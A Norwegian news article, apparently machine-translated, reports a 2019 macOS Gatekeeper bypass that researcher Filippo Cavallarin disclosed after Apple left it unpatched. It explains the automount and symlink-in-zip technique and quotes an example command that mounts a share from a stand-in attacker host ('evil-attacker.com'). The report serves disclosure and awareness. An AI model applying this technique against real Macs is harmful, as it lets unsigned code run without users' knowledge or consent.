Det er enkelt å installere en ondsinnet app på en Mac. Apple har ikke fikset feilen selv etter tre måneder

27. 5. 2019

Sikkerhetsforsker Filippo Cavallarin la ut en advarsel om feilen i macOS 10.14.5 på bloggen sin. Dette består i muligheten for å omgå Gatekeepers sikkerhetstiltak fullstendig. Ifølge Cavallarin påpekte han feilen til Apple allerede i februar i år, men selskapet fikset det ikke i den siste oppdateringen.

Gatekeeper ble utviklet av Apple og innlemmet i sitt skrivebordsoperativsystem for første gang i 2012. Det er en mekanisme som hindrer en applikasjon i å kjøre uten brukerens viten og samtykke. Etter at du har lastet ned en app, sjekker Gatekeeper automatisk koden for å se om programvaren er riktig signert av Apple.

I sitt blogginnlegg uttaler Cavallarin at Gatekeeper, som standard, anser både ekstern lagring og nettverksdeling for å være sikre lokasjoner. Enhver applikasjon som ligger i disse målene kan derfor startes automatisk uten å måtte gå gjennom Gatekeeper-kontrollen. Det er denne funksjonen som kan utnyttes til å starte skadelig programvare uten brukerens viten.

Et aspekt som tillater uautorisert tilgang er automount-funksjonen, som lar brukere automatisk montere en nettverksressurs ganske enkelt ved å spesifisere en bane som begynner med "/net/". Som et eksempel nevner Cavallarin banen "ls /net/evil-attacker.com/sharedfolder/" som kan føre til at operativsystemet laster innholdet i en "sharemappe"-mappe på et eksternt sted som kan være potensielt skadelig.

Du kan se hvordan trusselen fungerer i videoen:

En annen faktor er det faktum at hvis et zip-arkiv som inneholder en spesifikk symbolkobling som fører til automount-funksjonen deles, vil det ikke bli sjekket av Gatekeeper. På denne måten kan offeret enkelt laste ned det ondsinnede arkivet og pakke det ut, slik at angriperen kan kjøre praktisk talt hvilken som helst programvare på Mac-en uten brukerens viten. Finder, som skjuler visse utvidelser som standard, har også sin del av dette sikkerhetsproblemet.

Cavallarin uttaler på bloggen sin at Apple trakk oppmerksomheten til sårbarheten til macOS-operativsystemet 22. februar i år. Men i midten av mai sluttet Apple å kommunisere med Cavallarin, så Cavallarin bestemte seg for å gjøre det hele offentlig.

kilde: FCVL

Emner: Oppbevaring, Automatisk, MacOS, video, Innstillinger, funksjon, bruker, aplikace, eple

Diskusjon av artikkelen

Ditt navn

Din kommentar

Ved å fylle ut dataene ovenfor, bekrefter jeg at selskapet TEXT FACTORY s.r.o., registrert kontor i Brno, Durďákova 336/29, Černá Pole, postnummer: 613 00, ID-nummer: 06157831, registrert ved seksjon C i Brno , sett inn 100399, vil behandle mine personopplysninger oppgitt i registreringsskjemaet fylt ut av meg på grunnlag av de legitime interessene til TEXT FACTORY s.r.o. i henhold til artikkel 6 paragraf 1 brev f) GDPR og for å oppfylle juridiske forpliktelser (artikkel 6, nr. 1, bokstav c) GDPR), for følgende formål: nødvendigheten av å sikre autorisasjon av besøkende på nettsteder som drives av TEXT FACTORY s.r.o. for å bidra aktivt til publiserte artikler eller i diskusjon fora og utøve rettighetene til TEXT FACTORY s.r.o. som administrator av disse diskusjonsforumene. Mer informasjon om behandling av personopplysninger og rettigheter finnes i Leksjoner om beskyttelse av personopplysninger. hele teksten

Det kan være interesserer deg

I slekt